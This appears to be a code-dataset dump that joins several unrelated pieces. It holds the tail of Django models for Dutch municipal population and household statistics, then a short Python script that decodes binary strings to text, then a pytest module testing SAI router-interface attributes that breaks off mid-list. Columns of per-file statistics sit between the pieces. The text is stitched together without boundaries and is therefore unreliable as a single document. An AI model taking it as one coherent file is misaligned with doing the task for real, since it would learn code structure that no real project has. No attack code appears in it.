number_85tot90jaar = models.IntegerField(db_column='85tot90jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_90tot95jaar = models.IntegerField(db_column='90tot95jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_95jaarofouder = models.IntegerField(db_column='95jaarofouder', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
totaalmannen = models.IntegerField(db_column='Totaalmannen', blank=True, null=True) # Field name made lowercase.
number_0tot5jaar_1 = models.IntegerField(db_column='0tot5jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_5tot10jaar_1 = models.IntegerField(db_column='5tot10jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_10tot15jaar_1 = models.IntegerField(db_column='10tot15jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_15tot20jaar_1 = models.IntegerField(db_column='15tot20jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_20tot25jaar_1 = models.IntegerField(db_column='20tot25jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_25tot30jaar_1 = models.IntegerField(db_column='25tot30jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_30tot35jaar_1 = models.IntegerField(db_column='30tot35jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_35tot40jaar_1 = models.IntegerField(db_column='35tot40jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_40tot45jaar_1 = models.IntegerField(db_column='40tot45jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_45tot50jaar_1 = models.IntegerField(db_column='45tot50jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_50tot55jaar_1 = models.IntegerField(db_column='50tot55jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_55tot60jaar_1 = models.IntegerField(db_column='55tot60jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_60tot65jaar_1 = models.IntegerField(db_column='60tot65jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_65tot70jaar_1 = models.IntegerField(db_column='65tot70jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_70tot75jaar_1 = models.IntegerField(db_column='70tot75jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_75tot80jaar_1 = models.IntegerField(db_column='75tot80jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_80tot85jaar_1 = models.IntegerField(db_column='80tot85jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_85tot90jaar_1 = models.IntegerField(db_column='85tot90jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_90tot95jaar_1 = models.IntegerField(db_column='90tot95jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_95jaarofouder_1 = models.IntegerField(db_column='95jaarofouder.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
totaalvrouwen = models.IntegerField(db_column='Totaalvrouwen', blank=True, null=True) # Field name made lowercase.
number_0tot5jaar_2 = models.IntegerField(db_column='0tot5jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_5tot10jaar_2 = models.IntegerField(db_column='5tot10jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_10tot15jaar_2 = models.IntegerField(db_column='10tot15jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_15tot20jaar_2 = models.IntegerField(db_column='15tot20jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_20tot25jaar_2 = models.IntegerField(db_column='20tot25jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_25tot30jaar_2 = models.IntegerField(db_column='25tot30jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_30tot35jaar_2 = models.IntegerField(db_column='30tot35jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_35tot40jaar_2 = models.IntegerField(db_column='35tot40jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_40tot45jaar_2 = models.IntegerField(db_column='40tot45jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_45tot50jaar_2 = models.IntegerField(db_column='45tot50jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_50tot55jaar_2 = models.IntegerField(db_column='50tot55jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_55tot60jaar_2 = models.IntegerField(db_column='55tot60jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_60tot65jaar_2 = models.IntegerField(db_column='60tot65jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_65tot70jaar_2 = models.IntegerField(db_column='65tot70jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_70tot75jaar_2 = models.IntegerField(db_column='70tot75jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_75tot80jaar_2 = models.IntegerField(db_column='75tot80jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_80tot85jaar_2 = models.IntegerField(db_column='80tot85jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_85tot90jaar_2 = models.IntegerField(db_column='85tot90jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_90tot95jaar_2 = models.IntegerField(db_column='90tot95jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_95jaarofouder_2 = models.IntegerField(db_column='95jaarofouder.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
totaalpersonenmetmigratieachtergrond = models.IntegerField(db_column='Totaalpersonenmetmigratieachtergrond', blank=True, null=True) # Field name made lowercase.
personenmeteenwestersemigratieachtergrond = models.IntegerField(db_column='Personenmeteenwestersemigratieachtergrond', blank=True, null=True) # Field name made lowercase.
personenmeteenniet_westersemigratieachtergrond = models.IntegerField(db_column='Personenmeteenniet-westersemigratieachtergrond', blank=True, null=True) # Field name made lowercase. Field renamed to remove unsuitable characters.
totaalparticulierehuishoudens = models.IntegerField(db_column='Totaalparticulierehuishoudens', blank=True, null=True) # Field name made lowercase.
eenpersoonshuishoudens = models.IntegerField(db_column='Eenpersoonshuishoudens', blank=True, null=True) # Field name made lowercase.
meerpersoonshuishoudenszonderkinderen = models.IntegerField(db_column='Meerpersoonshuishoudenszonderkinderen', blank=True, null=True) # Field name made lowercase.
meerpersoonshuishoudensmetkinderen = models.IntegerField(db_column='Meerpersoonshuishoudensmetkinderen', blank=True, null=True) # Field name made lowercase.
gemiddeldehuishoudensgrootte = models.FloatField(db_column='Gemiddeldehuishoudensgrootte', blank=True, null=True) # Field name made lowercase.
housing_price = models.IntegerField(blank=True, null=True)
transport = models.IntegerField(blank=True, null=True)
area = models.FloatField(blank=True, null=True)
transport_per_km2 = models.FloatField(blank=True, null=True)
class Meta:
managed = True
db_table = 'gemeente'
class Summary(models.Model):
id = models.AutoField(unique=True, primary_key=True)
province = models.TextField(blank=True, null=True)
electricity = models.IntegerField(blank=True, null=True)
gas = models.IntegerField(blank=True, null=True)
totaalmannenenvrouwen = models.IntegerField(db_column='Totaalmannenenvrouwen', blank=True, null=True) # Field name made lowercase.
number_0tot5jaar = models.IntegerField(db_column='0tot5jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_5tot10jaar = models.IntegerField(db_column='5tot10jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_10tot15jaar = models.IntegerField(db_column='10tot15jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_15tot20jaar = models.IntegerField(db_column='15tot20jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_20tot25jaar = models.IntegerField(db_column='20tot25jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_25tot30jaar = models.IntegerField(db_column='25tot30jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_30tot35jaar = models.IntegerField(db_column='30tot35jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_35tot40jaar = models.IntegerField(db_column='35tot40jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_40tot45jaar = models.IntegerField(db_column='40tot45jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_45tot50jaar = models.IntegerField(db_column='45tot50jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_50tot55jaar = models.IntegerField(db_column='50tot55jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_55tot60jaar = models.IntegerField(db_column='55tot60jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_60tot65jaar = models.IntegerField(db_column='60tot65jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_65tot70jaar = models.IntegerField(db_column='65tot70jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_70tot75jaar = models.IntegerField(db_column='70tot75jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_75tot80jaar = models.IntegerField(db_column='75tot80jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_80tot85jaar = models.IntegerField(db_column='80tot85jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_85tot90jaar = models.IntegerField(db_column='85tot90jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_90tot95jaar = models.IntegerField(db_column='90tot95jaar', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
number_95jaarofouder = models.IntegerField(db_column='95jaarofouder', blank=True, null=True) # Field renamed because it wasn't a valid Python identifier.
totaalmannen = models.IntegerField(db_column='Totaalmannen', blank=True, null=True) # Field name made lowercase.
number_0tot5jaar_1 = models.IntegerField(db_column='0tot5jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_5tot10jaar_1 = models.IntegerField(db_column='5tot10jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_10tot15jaar_1 = models.IntegerField(db_column='10tot15jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_15tot20jaar_1 = models.IntegerField(db_column='15tot20jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_20tot25jaar_1 = models.IntegerField(db_column='20tot25jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_25tot30jaar_1 = models.IntegerField(db_column='25tot30jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_30tot35jaar_1 = models.IntegerField(db_column='30tot35jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_35tot40jaar_1 = models.IntegerField(db_column='35tot40jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_40tot45jaar_1 = models.IntegerField(db_column='40tot45jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_45tot50jaar_1 = models.IntegerField(db_column='45tot50jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_50tot55jaar_1 = models.IntegerField(db_column='50tot55jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_55tot60jaar_1 = models.IntegerField(db_column='55tot60jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_60tot65jaar_1 = models.IntegerField(db_column='60tot65jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_65tot70jaar_1 = models.IntegerField(db_column='65tot70jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_70tot75jaar_1 = models.IntegerField(db_column='70tot75jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_75tot80jaar_1 = models.IntegerField(db_column='75tot80jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_80tot85jaar_1 = models.IntegerField(db_column='80tot85jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_85tot90jaar_1 = models.IntegerField(db_column='85tot90jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_90tot95jaar_1 = models.IntegerField(db_column='90tot95jaar.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_95jaarofouder_1 = models.IntegerField(db_column='95jaarofouder.1', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
totaalvrouwen = models.IntegerField(db_column='Totaalvrouwen', blank=True, null=True) # Field name made lowercase.
number_0tot5jaar_2 = models.IntegerField(db_column='0tot5jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_5tot10jaar_2 = models.IntegerField(db_column='5tot10jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_10tot15jaar_2 = models.IntegerField(db_column='10tot15jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_15tot20jaar_2 = models.IntegerField(db_column='15tot20jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_20tot25jaar_2 = models.IntegerField(db_column='20tot25jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_25tot30jaar_2 = models.IntegerField(db_column='25tot30jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_30tot35jaar_2 = models.IntegerField(db_column='30tot35jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_35tot40jaar_2 = models.IntegerField(db_column='35tot40jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_40tot45jaar_2 = models.IntegerField(db_column='40tot45jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_45tot50jaar_2 = models.IntegerField(db_column='45tot50jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_50tot55jaar_2 = models.IntegerField(db_column='50tot55jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_55tot60jaar_2 = models.IntegerField(db_column='55tot60jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_60tot65jaar_2 = models.IntegerField(db_column='60tot65jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_65tot70jaar_2 = models.IntegerField(db_column='65tot70jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_70tot75jaar_2 = models.IntegerField(db_column='70tot75jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_75tot80jaar_2 = models.IntegerField(db_column='75tot80jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_80tot85jaar_2 = models.IntegerField(db_column='80tot85jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_85tot90jaar_2 = models.IntegerField(db_column='85tot90jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_90tot95jaar_2 = models.IntegerField(db_column='90tot95jaar.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
number_95jaarofouder_2 = models.IntegerField(db_column='95jaarofouder.2', blank=True, null=True) # Field renamed to remove unsuitable characters. Field renamed because it wasn't a valid Python identifier.
totaalpersonenmetmigratieachtergrond = models.IntegerField(db_column='Totaalpersonenmetmigratieachtergrond', blank=True, null=True) # Field name made lowercase.
personenmeteenwestersemigratieachtergrond = models.IntegerField(db_column='Personenmeteenwestersemigratieachtergrond', blank=True, null=True) # Field name made lowercase.
personenmeteenniet_westersemigratieachtergrond = models.IntegerField(db_column='Personenmeteenniet-westersemigratieachtergrond', blank=True, null=True) # Field name made lowercase. Field renamed to remove unsuitable characters.
totaalparticulierehuishoudens = models.IntegerField(db_column='Totaalparticulierehuishoudens', blank=True, null=True) # Field name made lowercase.
eenpersoonshuishoudens = models.IntegerField(db_column='Eenpersoonshuishoudens', blank=True, null=True) # Field name made lowercase.
meerpersoonshuishoudenszonderkinderen = models.IntegerField(db_column='Meerpersoonshuishoudenszonderkinderen', blank=True, null=True) # Field name made lowercase.
meerpersoonshuishoudensmetkinderen = models.IntegerField(db_column='Meerpersoonshuishoudensmetkinderen', blank=True, null=True) # Field name made lowercase.
gemiddeldehuishoudensgrootte = models.FloatField(db_column='Gemiddeldehuishoudensgrootte', blank=True, null=True) # Field name made lowercase.
housing_price = models.FloatField(blank=True, null=True)
transport = models.IntegerField(blank=True, null=True)
area = models.FloatField(blank=True, null=True)
transport_per_km2 = models.FloatField(blank=True, null=True)
class Meta:
managed = True
db_table = 'summary'
| 106.462329
| 232
| 0.781034
| 4,087
| 31,087
| 5.835087
| 0.047468
| 0.101644
| 0.087219
| 0.114056
| 0.938695
| 0.932196
| 0.926577
| 0.915045
| 0.90951
| 0.901166
| 0
| 0.040945
| 0.134236
| 31,087
| 291
| 233
| 106.828179
| 0.845136
| 0.385949
| 0
| 0.754032
| 1
| 0
| 0.127303
| 0.033582
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.004032
| 0.004032
| 0
| 0.883065
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
878e4bdb8b7a7be746a3cd51a0329b55e4760524
| 681
|
py
|
Python
|
#202/easy/I AM BENDER. PLEASE INSERT GIRDER.py
|
Azd325/r_dailyprogrammer
|
37de4688469fe2f865f8d7a59875e78523cee8aa
|
[
"Unlicense"
] | null | null | null |
#202/easy/I AM BENDER. PLEASE INSERT GIRDER.py
|
Azd325/r_dailyprogrammer
|
37de4688469fe2f865f8d7a59875e78523cee8aa
|
[
"Unlicense"
] | null | null | null |
#202/easy/I AM BENDER. PLEASE INSERT GIRDER.py
|
Azd325/r_dailyprogrammer
|
37de4688469fe2f865f8d7a59875e78523cee8aa
|
[
"Unlicense"
] | null | null | null |
# coding: utf-8
binary = '0100100001100101011011000110110001101111001000000101011101101111011100100110110001100100'
binary_test_1 = '0111000001101100011001010110000101110011011001010010000001110100011000010110110001101011001000000111010001101111001000000110110101100101'
binary_test_2 = '011011000110100101100110011001010010000001110010011010010110011101101000011101000010000001101110011011110111011100100000011010010111001100100000011011000110111101101110011001010110110001111001'
def bin2text(bin_text):
return ''.join(chr(int(bin_text[i:i+8], 2)) for i in range(0, len(bin_text), 8))
print(bin2text(binary))
print(bin2text(binary_test_1))
print(bin2text(binary_test_2))
| 48.642857
| 210
| 0.881057
| 49
| 681
| 12.020408
| 0.510204
| 0.067912
| 0.096774
| 0.078098
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.66306
| 0.049927
| 681
| 13
| 211
| 52.384615
| 0.247295
| 0.01909
| 0
| 0
| 0
| 0
| 0.625564
| 0.625564
| 0
| 1
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0
| 0.125
| 0.25
| 0.375
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
356b35bcc99ec2a05ee2d15695ae0145fd36475e
| 9,210
|
py
|
Python
|
tests/ut/test_rif.py
|
bohdanblavatnyi/sai-challenger
|
7de2b8811040f8c9056cc5c9339ac0bf83dd5d1a
|
[
"Apache-2.0"
] | null | null | null |
tests/ut/test_rif.py
|
bohdanblavatnyi/sai-challenger
|
7de2b8811040f8c9056cc5c9339ac0bf83dd5d1a
|
[
"Apache-2.0"
] | null | null | null |
tests/ut/test_rif.py
|
bohdanblavatnyi/sai-challenger
|
7de2b8811040f8c9056cc5c9339ac0bf83dd5d1a
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from sai import SaiObjType
rif_attrs = [
("SAI_ROUTER_INTERFACE_ATTR_VIRTUAL_ROUTER_ID", "sai_object_id_t"),
("SAI_ROUTER_INTERFACE_ATTR_TYPE", "sai_router_interface_type_t"),
("SAI_ROUTER_INTERFACE_ATTR_PORT_ID", "sai_object_id_t"),
("SAI_ROUTER_INTERFACE_ATTR_VLAN_ID", "sai_object_id_t"),
("SAI_ROUTER_INTERFACE_ATTR_SRC_MAC_ADDRESS", "sai_mac_t"),
("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V4_STATE", "bool"),
("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V6_STATE", "bool"),
("SAI_ROUTER_INTERFACE_ATTR_MTU", "sai_uint32_t"),
("SAI_ROUTER_INTERFACE_ATTR_INGRESS_ACL", "sai_object_id_t"),
("SAI_ROUTER_INTERFACE_ATTR_EGRESS_ACL", "sai_object_id_t"),
("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "sai_packet_action_t"),
("SAI_ROUTER_INTERFACE_ATTR_V4_MCAST_ENABLE", "bool"),
("SAI_ROUTER_INTERFACE_ATTR_V6_MCAST_ENABLE", "bool"),
("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "sai_packet_action_t"),
("SAI_ROUTER_INTERFACE_ATTR_IS_VIRTUAL", "bool"),
("SAI_ROUTER_INTERFACE_ATTR_NAT_ZONE_ID", "sai_uint8_t"),
("SAI_ROUTER_INTERFACE_ATTR_DISABLE_DECREMENT_TTL", "bool"),
("SAI_ROUTER_INTERFACE_ATTR_ADMIN_MPLS_STATE", "bool")
]
rif_attrs_default = {}
rif_attrs_updated = {}
@pytest.fixture(scope="module")
def sai_rif_obj_port(npu):
vrf_oid1 = npu.create(SaiObjType.VIRTUAL_ROUTER, [])
rif_oid = npu.create(SaiObjType.ROUTER_INTERFACE,
[
'SAI_ROUTER_INTERFACE_ATTR_TYPE', 'SAI_ROUTER_INTERFACE_TYPE_PORT',
'SAI_ROUTER_INTERFACE_ATTR_PORT_ID', npu.port_oids[0],
'SAI_ROUTER_INTERFACE_ATTR_VIRTUAL_ROUTER_ID', vrf_oid1
])
yield rif_oid
npu.remove(rif_oid)
@pytest.fixture(scope="module")
def sai_rif_obj_vlan(npu):
vlan_oid = npu.create(SaiObjType.VLAN, ["SAI_VLAN_ATTR_VLAN_ID", "10"])
vrf_oid1 = npu.create(SaiObjType.VIRTUAL_ROUTER, [])
rif_oid = npu.create(SaiObjType.ROUTER_INTERFACE,
[
'SAI_ROUTER_INTERFACE_ATTR_TYPE', 'SAI_ROUTER_INTERFACE_TYPE_VLAN',
'SAI_ROUTER_INTERFACE_ATTR_VLAN_ID', vlan_oid,
'SAI_ROUTER_INTERFACE_ATTR_VIRTUAL_ROUTER_ID', vrf_oid1
])
yield rif_oid
npu.remove(rif_oid)
npu.remove(vrf_oid1)
npu.remove(vlan_oid)
@pytest.mark.parametrize(
"attr,attr_type",
rif_attrs
)
def test_get_before_set_attr_port(npu, dataplane, sai_rif_obj_port, attr, attr_type):
status, data = npu.get_by_type(sai_rif_obj_port, attr, attr_type, do_assert=False)
npu.assert_status_success(status)
if status == "SAI_STATUS_SUCCESS":
rif_attrs_default[attr] = data.value()
@pytest.mark.parametrize(
"attr,attr_type",
rif_attrs
)
def test_get_before_set_attr_vlan(npu, dataplane, sai_rif_obj_vlan, attr, attr_type):
status, data = npu.get_by_type(sai_rif_obj_vlan, attr, attr_type, do_assert=False)
npu.assert_status_success(status)
if status == "SAI_STATUS_SUCCESS":
rif_attrs_default[attr] = data.value()
valued_attr = [
("SAI_ROUTER_INTERFACE_ATTR_TYPE", "SAI_ROUTER_INTERFACE_TYPE_PORT"),
("SAI_ROUTER_INTERFACE_ATTR_TYPE", "SAI_ROUTER_INTERFACE_TYPE_VLAN"),
("SAI_ROUTER_INTERFACE_ATTR_PORT_ID", "oid:0x0"),
("SAI_ROUTER_INTERFACE_ATTR_VLAN_ID", "oid:0x0"),
("SAI_ROUTER_INTERFACE_ATTR_SRC_MAC_ADDRESS", "00:11:11:11:11:11"),
("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V4_STATE", "true"),
("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V4_STATE", "false"),
("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V6_STATE", "true"),
("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V6_STATE", "false"),
("SAI_ROUTER_INTERFACE_ATTR_MTU", "1500"),
("SAI_ROUTER_INTERFACE_ATTR_INGRESS_ACL", "oid:0x0"),
("SAI_ROUTER_INTERFACE_ATTR_EGRESS_ACL", "oid:0x0"),
("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_DROP"),
("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_FORWARD"),
("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_COPY"),
("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_COPY_CANCEL"),
("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_TRAP"),
("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_LOG"),
("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_DENY"),
("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "SAI_PACKET_ACTION_TRANSIT"),
("SAI_ROUTER_INTERFACE_ATTR_V4_MCAST_ENABLE", "true"),
("SAI_ROUTER_INTERFACE_ATTR_V4_MCAST_ENABLE", "false"),
("SAI_ROUTER_INTERFACE_ATTR_V6_MCAST_ENABLE", "true"),
("SAI_ROUTER_INTERFACE_ATTR_V6_MCAST_ENABLE", "false"),
("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_DROP"),
("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_FORWARD"),
("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_COPY"),
("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_COPY_CANCEL"),
("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_TRAP"),
("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_LOG"),
("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_DENY"),
("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "SAI_PACKET_ACTION_TRANSIT"),
